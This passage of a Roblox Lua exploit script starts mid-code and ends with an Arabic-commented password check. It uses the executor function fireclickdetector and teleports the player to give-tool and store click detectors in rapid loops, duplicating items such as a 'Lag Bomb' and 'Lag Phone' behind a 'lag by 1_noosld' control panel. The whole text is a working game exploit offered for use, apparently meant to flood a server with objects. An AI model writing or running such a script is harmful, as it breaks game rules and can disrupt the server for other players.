tool:Destroy() end end end for _, obj in ipairs(workspace:GetChildren()) do if obj:IsA("Tool") then obj:Destroy() end end end local function StartInfiniteDupe(toolName, actionFunc) if runningLoops[toolName] then return end runningLoops[toolName] = true hasStartedDuping[toolName] = false task.spawn(function() while runningLoops[toolName] do local char = player.Character or player.CharacterAdded:Wait() local root = char:FindFirstChild("HumanoidRootPart") if root then for i = 1, 2 do actionFunc() end local count = CountTool(toolName) if count > 0 and not hasStartedDuping[toolName] then hasStartedDuping[toolName] = true HideCharacter() end end task.wait(0) end end) end local function StopInfiniteDupe(toolName) if runningLoops[toolName] then runningLoops[toolName] = nil hasStartedDuping[toolName] = nil ShowCharacter() local humanoid = player.Character and player.Character:FindFirstChildOfClass("Humanoid") if humanoid then humanoid.Health = 0 end ClearTools() end end local gui = Instance.new("ScreenGui") gui.Name = "ToolDupeGUI" gui.ResetOnSpawn = false gui.Parent = game:GetService("CoreGui") local toggle = Instance.new("TextButton") toggle.Size = UDim2.new(0, 50, 0, 50) toggle.Position = UDim2.new(0, 20, 0, 50) toggle.BackgroundColor3 = Color3.fromRGB(0, 0, 0) toggle.Text = "3" toggle.TextColor3 = Color3.fromRGB(255, 0, 0) toggle.Font = Enum.Font.GothamBold toggle.TextScaled = true toggle.BorderSizePixel = 2 toggle.BorderColor3 = Color3.fromRGB(255, 0, 0) toggle.Parent = gui local main = Instance.new("Frame") main.Size = UDim2.new(0, 250, 0, 350) main.Position = UDim2.new(0, 20, 0, 120) main.BackgroundColor3 = Color3.fromRGB(0, 0, 0) main.BorderColor3 = Color3.fromRGB(255, 0, 0) main.ClipsDescendants = true main.Visible = false main.Parent = gui local uicorner = Instance.new("UICorner") uicorner.CornerRadius = UDim.new(0, 15) uicorner.Parent = main local title = Instance.new("TextLabel") title.Size = UDim2.new(1, 0, 0, 40) title.BackgroundTransparency = 1 title.Text = "lag by 1_noosld" title.TextColor3 = Color3.fromRGB(255, 0, 0) title.Font = Enum.Font.GothamBold title.TextScaled = true title.Parent = main local function CreateToolControls(toolLabel, toolName, yPos, actionFunc) local startBtn = Instance.new("TextButton") startBtn.Size = UDim2.new(0, 110, 0, 35) startBtn.Position = UDim2.new(0, 10, 0, yPos) startBtn.Text = "Start " .. toolLabel startBtn.BackgroundColor3 = Color3.fromRGB(40, 0, 0) startBtn.TextColor3 = Color3.fromRGB(255, 0, 0) startBtn.Font = Enum.Font.GothamSemibold startBtn.TextScaled = true startBtn.BorderColor3 = Color3.fromRGB(255, 0, 0) startBtn.Parent = main local stopBtn = Instance.new("TextButton") stopBtn.Size = UDim2.new(0, 70, 0, 35) stopBtn.Position = UDim2.new(0, 130, 0, yPos) stopBtn.Text = "Stop" stopBtn.BackgroundColor3 = Color3.fromRGB(15, 0, 0) stopBtn.TextColor3 = Color3.fromRGB(255, 0, 0) stopBtn.Font = Enum.Font.GothamSemibold stopBtn.TextScaled = true stopBtn.BorderColor3 = Color3.fromRGB(255, 0, 0) stopBtn.Parent = main local counter = Instance.new("TextLabel") counter.Size = UDim2.new(0, 35, 0, 35) counter.Position = UDim2.new(0, 200, 0, yPos) counter.BackgroundTransparency = 1 counter.TextColor3 = Color3.fromRGB(255, 0, 0) counter.Font = Enum.Font.GothamSemibold counter.TextScaled = true counter.Text = "0" counter.Parent = main counters[toolName] = counter startBtn.MouseButton1Click:Connect(function() StartInfiniteDupe(toolName, actionFunc) end) stopBtn.MouseButton1Click:Connect(function() StopInfiniteDupe(toolName) end) end local function GiveTool(toolName) local giveTools = workspace:FindFirstChild("WorkspaceCom") and workspace.WorkspaceCom:FindFirstChild("001_GiveTools") local toolObject = giveTools and giveTools:FindFirstChild(toolName) local detector = toolObject and toolObject:FindFirstChildOfClass("ClickDetector") if toolObject and detector then local root = player.Character and player.Character:FindFirstChild("HumanoidRootPart") if root then root.CFrame = toolObject.CFrame + Vector3.new(0,2,0) fireclickdetector(detector) fireclickdetector(detector) end end end CreateToolControls("Taser", "Taser", 60, function() GiveTool("Taser") end) CreateToolControls("FireX", "FireX", 110, function() GiveTool("FireX") end) CreateToolControls("Assault", "Assault", 160, function() GiveTool("Assault") end) CreateToolControls("Basketball", "Basketball", 210, function() GiveTool("Basketball") end) CreateToolControls("Lag Phone", "Iphone", 260, function() local phone = workspace:FindFirstChild("WorkspaceCom") and workspace.WorkspaceCom:FindFirstChild("001_CommercialStores") phone = phone and phone:FindFirstChild("CommercialStorage1") phone = phone and phone:FindFirstChild("Store") phone = phone and phone:FindFirstChild("Tools") phone = phone and phone:FindFirstChild("Iphone") local detector = phone and phone:FindFirstChildOfClass("ClickDetector") if phone and detector then local root = player.Character and player.Character:FindFirstChild("HumanoidRootPart") if root then root.CFrame = phone.CFrame + Vector3.new(0, 2, 0) fireclickdetector(detector) end end end) CreateToolControls("Lag Bomb", "Bomb", 310, function() local bomb = workspace:FindFirstChild("WorkspaceCom") and workspace.WorkspaceCom:FindFirstChild("001_CriminalWeapons") bomb = bomb and bomb:FindFirstChild("GiveTools") bomb = bomb and bomb:FindFirstChild("Bomb") local detector = bomb and bomb:FindFirstChildOfClass("ClickDetector") if bomb and detector then local root = player.Character and player.Character:FindFirstChild("HumanoidRootPart") if root then root.CFrame = bomb.CFrame fireclickdetector(detector) end end end) RunService.Heartbeat:Connect(function() for toolName, label in pairs(counters) do label.Text = tostring(CountTool(toolName)) end end) toggle.MouseButton1Click:Connect(function() main.Visible = not main.Visible end) local function makeGuiDraggable(guiElement) local dragging, dragInput, dragStart, startPos local function update(input) if not dragging then return end local delta = input.Position - dragStart guiElement.Position = UDim2.new( startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y ) end guiElement.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true dragStart = input.Position startPos = guiElement.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragging = false end end) end end) guiElement.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) UserInputService.InputChanged:Connect(function(input) if input == dragInput then update(input) end end) end makeGuiDraggable(main) makeGuiDraggable(toggle) end -- منطق التحقق من كلمة المرور لتشغيل السكربت بالكامل checkBtn.MouseButton1Click:Connect(function() if passBox.Text == CORRECT_PASSWORD then StartDRKHub() else passBox.Text = "" passBox.PlaceholderText = "❌ كلمة المرور خاطئة! حاول مجدداً" TweenService:Create(loginStroke, TweenInfo.new(0.2), {Color = Color3.fromRGB(255, 255, 0)}):Play() task.wait(0.2) TweenService:Create(loginStroke, TweenInfo.new(0.2), {Color = Color3.fromRGB(200, 0, 0)}):Play() end end)